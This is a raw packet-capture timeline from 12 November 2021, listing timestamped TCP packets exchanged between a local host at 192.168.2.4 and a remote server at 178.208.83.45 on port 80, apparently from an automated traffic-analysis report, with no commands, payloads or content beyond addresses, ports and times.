                          Nov 12, 2021 22:23:39.059878111 CET8049872178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.059912920 CET8049873178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.060111046 CET4987280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.060175896 CET4987380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.061650038 CET8049874178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.061887026 CET4987480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.063790083 CET4987480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.090415955 CET8049874178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.095176935 CET8049874178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.095519066 CET4987480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.204219103 CET4987480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.205492973 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.227971077 CET8049874178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.228017092 CET8049875178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.228121042 CET4987480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.228301048 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.229237080 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.253813028 CET8049875178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.255722046 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.256118059 CET8049875178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.256525040 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.281109095 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.281294107 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.282223940 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.282376051 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.282567978 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.282690048 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.304550886 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.304641008 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.304799080 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.304840088 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.304872036 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.304907084 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.305071115 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305083990 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305094957 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305108070 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305159092 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.305160999 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305175066 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305198908 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.305233002 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.305898905 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305917978 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.305998087 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.327867985 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327893972 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327909946 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327924013 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327939987 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327954054 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327974081 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.327982903 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.327984095 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328000069 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328015089 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328041077 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328041077 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.328068018 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.328068018 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328071117 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328077078 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328088045 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328116894 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.328346968 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.328911066 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328932047 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328948975 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328968048 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.328974962 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.329016924 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.329037905 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350433111 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350467920 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350493908 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350585938 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350620985 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350651979 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350680113 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350707054 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350732088 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350733995 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350752115 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350759983 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350786924 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350797892 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350816965 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350824118 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.350847006 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350873947 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350899935 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350925922 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350950956 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.350977898 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351002932 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351030111 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351058960 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351070881 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.351084948 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351111889 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351140976 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351165056 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351191044 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351217031 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351243973 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351272106 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351296902 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351330996 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351356983 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351382017 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351408958 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351433992 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.351463079 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.352438927 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.352467060 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.352493048 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.352519035 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.360896111 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.361675024 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.374938965 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.374980927 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.374998093 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375036955 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375057936 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375083923 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375111103 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375135899 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375161886 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375188112 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375212908 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375238895 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375266075 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375291109 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375315905 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375341892 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375365973 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.375983953 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.377806902 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.377918005 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.383791924 CET8049875178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.383965015 CET4987580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.383987904 CET8049877178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.384084940 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.384613991 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.407345057 CET8049877178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.412955046 CET8049877178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.413079977 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.516330957 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.516588926 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.517735004 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.538595915 CET8049877178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.538700104 CET4987780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.538943052 CET8049876178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.539114952 CET4987680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.540155888 CET8049878178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.540280104 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.540863037 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.563316107 CET8049878178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.565828085 CET8049878178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.565907001 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.673841000 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.677747965 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.696475029 CET8049878178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.696599007 CET4987880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.700314999 CET8049879178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.700510025 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.701807976 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.724895954 CET8049879178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.727602005 CET8049879178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.727734089 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.833939075 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.835176945 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.847008944 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.856704950 CET8049879178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.856780052 CET4987980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.857665062 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.857759953 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.858352900 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.858475924 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.858669043 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.859452963 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.869894028 CET8049882178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.870018005 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.870584011 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.880611897 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.880646944 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.880894899 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.880981922 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.881011963 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881047964 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881079912 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.881093025 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881107092 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881115913 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881117105 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.881129026 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881138086 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.881145954 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.881175041 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.881206036 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.882217884 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.882245064 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.882378101 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.892887115 CET8049882178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.896327972 CET8049882178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.896450996 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904189110 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904308081 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904329062 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904381990 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904386997 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904423952 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904455900 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904457092 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904485941 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904515982 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904546022 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904623032 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904670000 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904684067 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904691935 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904706001 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904712915 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904727936 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904736996 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904743910 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904751062 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904761076 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904766083 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904783964 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904834986 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904874086 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.904920101 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904948950 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904969931 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.904983044 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.905113935 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.905136108 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.926733017 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.926829100 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.926899910 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.926950932 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.926990032 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927032948 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927047014 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927057028 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927066088 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.927073956 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927090883 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927093983 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.927105904 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927120924 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927134037 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.927150965 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927155018 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.927191019 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927205086 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927226067 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927241087 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927256107 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927339077 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927359104 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:39.927400112 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927413940 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927428961 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927443981 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927460909 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927475929 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927675962 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927691936 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927707911 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927721977 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927737951 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927753925 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927767992 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927783012 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927798986 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927813053 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927829981 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927843094 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927858114 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927871943 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.927885056 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949311018 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949492931 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949630976 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949664116 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949687958 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949712992 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949737072 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949759960 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949875116 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.949992895 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.950021982 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.950047016 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.950294971 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.958003998 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:39.958100080 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.001981020 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.027946949 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.028067112 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.143006086 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.143954039 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.146413088 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.166532993 CET8049882178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.166539907 CET8049881178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.166649103 CET4988280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.166685104 CET4988180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.168988943 CET8049883178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.169161081 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.169699907 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.192092896 CET8049883178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.196660995 CET8049883178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.196738958 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.313129902 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.314641953 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.336107969 CET8049883178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.336215019 CET4988380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.337028027 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.337156057 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.337696075 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.360126019 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.362768888 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.362869978 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.371305943 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.371372938 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.371558905 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.371644020 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.393743038 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394077063 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394174099 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.394253016 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394283056 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394310951 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394314051 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.394326925 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.394337893 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.394337893 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.394371986 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.394403934 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.416840076 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.416924000 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.416954994 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.416973114 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417066097 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417076111 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417119026 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417160034 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417175055 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417185068 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417217970 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417220116 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417252064 CET8049884178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:40.417272091 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417304993 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417347908 CET4988480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:40.417541027 CET8049884178.208.83.45192.168.2.4
